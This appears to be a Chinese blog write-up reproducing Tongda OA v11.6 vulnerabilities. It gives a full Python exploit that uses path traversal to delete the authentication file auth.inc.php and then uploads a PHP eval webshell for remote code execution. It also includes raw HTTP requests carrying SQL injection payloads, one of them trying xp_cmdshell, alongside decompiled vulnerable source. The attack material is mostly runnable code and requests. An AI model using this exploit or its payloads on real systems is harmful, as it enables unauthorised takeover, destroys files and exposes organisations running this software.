lockcy's cave
0%

通达OA 0day复现

发表于 更新于
本文字数: 5.4k 阅读时长 ≈ 5 分钟

通达v11.6最近的几个0day,参考安译sec

fingerprint
title 通达OA网络智能办公系统
北京通达信科科技有限公司

一、 11.6任意文件上传导致的RCE

1.exp
exp网上一搜就有,但会删除auth.inc.php,影响oa的正常使用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests
target="http://10.10.10.130"  
payload="<?php eval($_POST['cmd']);?>"  
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")


url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('shell.php', payload)}
requests.post(url=url,files=files)
url=target+"/_shell.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

2.漏洞分析
源码是zend5.4加密的,先解密一下
webroot\module\appbuilder\assets\print.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php

$s_tmp = __DIR__ . "/../../../../logs/appbuilder/logs";
$s_tmp .= "/" . $_GET["guid"];

if (file_exists($s_tmp)) {
	$arr_data = unserialize(file_get_contents($s_tmp));
	unlink($s_tmp);
	$s_user = $arr_data["user"];
}
else {
	echo "未知参数";
	exit();
}

没有检查get请求的参数,导致目录穿透,传入../../../webroot/inc/auth.inc.php,通过unlink函数删除指定文件
删除auth.inc.php绕过验证调用上传函数

下边的漏洞是来自安译Sec对TDOA11.5测试的结果,经验证,发现11.6同样存在。
二、SQL注入

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
Host: 10.10.10.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: USER_NAME_COOKIE=admin; SID_1=47bc070b; PHPSESSID=8s9lvu5r48t3i8smligo7j8tr4; OA_USER_ID=admin
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1

漏洞文件
\general\appbuilder\modules\calendar\models\Calendar.php
get_callist_data函数中对begin_date变量未进行过滤

1
2
3
4
5
6
7
8
public function get_callist_data($begin_date, $end_date, $condition_str)
{
  include_once "inc/utility_org.php";
  $cur_time = modules\calendar\models\date("Y-m-d H:i:s", modules\calendar\models\time());
  $dataBack = array();
  $t_calendar = TD::tablefix("calendar");
  $t_affair = TD::tablefix("affair");
  $query = "SELECT * from $t_calendar where (USER_ID='" . $_SESSION["LOGIN_USER_ID"] . "' or find_in_set('" . $_SESSION["LOGIN_USER_ID"] . "',TAKER) or find_in_set('" . $_SESSION["LOGIN_USER_ID"] . "',OWNER) or find_in_set('" . $_SESSION["LOGIN_USER_ID"] . "',SHARE_USER))" . $condition_str . " and (CAL_TIME>='$begin_date' and CAL_TIME<='$end_date' || END_TIME>='$begin_date' and END_TIME<='$end_date' || CAL_TIME<='$begin_date' and END_TIME>='$end_date') order by CAL_TIME DESC";

三、SQL注入
\general\email\sentbox\get_index_data.php中调用了\inc\utility_email.php的get_sentbox_data函数,在该函数中,简单的拼接了$FIELD参数在order by后面造成了注入

1
$query .= " order by " . $FIELD;
1
2
3
4
5
6
7
8
9
GET /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=exec%20master%20xp_cmdshell%20`ping%2010.10.10.1`%20--&pagelimit=20&tag=&timestamp=1598069133&total= HTTP/1.1
Host: 10.10.10.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: USER_NAME_COOKIE=admin; SID_1=47bc070b; PHPSESSID=8s9lvu5r48t3i8smligo7j8tr4; OA_USER_ID=admin; KEY_RANDOMDATA=19400
Upgrade-Insecure-Requests: 1

这里和原文一样,因为检测到注释符,无法执行sql语句

https://www.freebuf.com/articles/network/247265.html
https://mp.weixin.qq.com/s/lAm-gzqNguFXhSojFFQxDA
https://mp.weixin.qq.com/s/XKZnsdY31N1_6gB9u8Yu8Q